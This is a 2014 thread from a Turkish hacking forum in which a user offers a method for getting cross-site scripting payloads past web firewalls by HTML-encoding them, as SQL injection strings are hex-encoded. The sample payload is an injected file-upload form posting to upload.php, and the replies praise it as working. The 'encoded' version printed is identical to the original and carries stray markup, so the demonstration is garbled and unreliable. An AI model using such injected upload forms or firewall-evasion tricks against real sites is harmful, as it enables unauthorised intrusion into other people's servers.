XSS İleri düzey Geliştirilmiş yöntemim //CuLLeN_s

CuLLeN_s · 10 Haz 2014

Arkadaşlar manuel sql injecion yapanlar Bilirler bazı kodlarımızı güvenlik duvarı engellediği için bilgileri çekemeyebiliriz o zamanda o komutları hex leyip bypass ederiz.

Peki bunu neden XSS dede yapmayalım ki?

ama xss de hex çalışmaz çünkü html ile php birbirinden farklı xss html ile baglantılıdır sql ise asp yada php.Php için hex yapıyorsak html içinde "html encoder" kullanıcaz

Nasıl mı..

linux serverde yani php ile kodlanmış bir sitede xss açığı olsun bir html upload kodu örnek verelim

Kod:

<form id="dosyayukle" action="upload.php" method="post" enctype=-<span class="i06t9mr20" id="i06t9mr20_8">multipart</span>/form-data">
<input type="file" name="dosya">
<input type="submit" value=-<span class="i06t9mr20" id="i06t9mr20_1">Ajax File Upload</span>->
</form>

<div id="progress">
<div id="bar"></div>
<div id="yuzde">0%</div >
</div>
<br/>

<div id="mesaj"></div>
</div>
<br/>

<div id="mesaj"></div>

bunu yazarsınız bazı sıtelerde bu kodlar güvenlik duvarı tarafından yakalanır ve çalışmaz.bu kodu html encoderde çevirdik

Kod:

<form id="dosyayukle" action="upload.php" method="post" enctype=-<span class="i06t9mr20" id="i06t9mr20_8">multipart</span>/form-data">
<input type="file" name="dosya">
<input type="submit" value=-<span class="i06t9mr20" id="i06t9mr20_1">Ajax File Upload</span>->
</form>

<div id="progress">
<div id="bar"></div>
<div id="yuzde">0%</div >
</div>
<br/>

<div id="mesaj"></div>
</div>
<br/>

<div id="mesaj"></div>

bide bunu deneyin olacaktır kesin sonuç vermeyebilir ama bi köşede dursun sql de hexleyıınce ne kadar kesın sonuc alıyorsanız buda o kadar kesın.

Tamamen Kendim türettim emege saygı..

TurkHackTeam.Net
CuLLeN_s

Altıok · 10 Haz 2014

Eline sağlık..
Kesin değil yani ama deneyeceğim..

CuLLeN_s · 10 Haz 2014

by ReFLekS' Alıntı:
Eline sağlık..
Kesin değil yani ama deneyeceğim..

hexlerken ne kadar kesinse buda o kadar kesin.

S4cuRiTy EneMy · 10 Haz 2014

Benim xss upload kodlarini html ile şifrelemişsin çalişiyor ise güzel eline sağlık

CuLLeN_s · 10 Haz 2014

S4cuRıTy EneMy' Alıntı:
Benim xss upload kodlarini html ile şifrelemişsin çalişiyor ise güzel eline sağlık

Çalışıyor. Evet senin kodlar Java script kodlarıda aynı şekilde bypass edilebiliyor.

Köstebek-02 · 11 Haz 2014

CuLLeN_s' Alıntı:
Çalışıyor. Evet senin kodlar Java script kodlarıda aynı şekilde bypass edilebiliyor.

eline sağlık babacanım yararlı ve çalışıyor

CuLLeN_s · 11 Haz 2014

shadow-mavi' Alıntı:
eline sağlık babacanım yararlı ve çalışıyor

saol abi.

stoped4 · 11 Haz 2014

eline saglık kardeş güzel yöntemmiş.

CuLLeN_s · 15 Haz 2014

stoped4' Alıntı:
eline saglık kardeş güzel yöntemmiş.

Isınıze yaradıysa ne mutlu bana.

stokw · 15 Haz 2014

yine cullens yine bomba gibi farklı bi şey eyvallah kardeşim çalışıyor

darktimer · 15 Haz 2014

deniyeceğim

CuLLeN_s · 30 Kas 2016

stokw' Alıntı:
yine cullens yine bomba gibi farklı bi şey eyvallah kardeşim çalışıyor

Calısıyor evet guzel yorumlarınız ıcın saolun arkadaslar.

XSS İleri düzey Geliştirilmiş yöntemim //CuLLeN_s

CuLLeN_s

Katılımcı Üye

Altıok

Kıdemli Üye

CuLLeN_s

Katılımcı Üye

S4cuRiTy EneMy

Yaşayan Forum Efsanesi

CuLLeN_s

Katılımcı Üye

Köstebek-02

Yaşayan Forum Efsanesi

CuLLeN_s

Katılımcı Üye

stoped4

Yeni üye

CuLLeN_s

Katılımcı Üye

stokw

Özel Üye

darktimer

Katılımcı Üye

CuLLeN_s

Katılımcı Üye

Sosyal medya sayfalarımız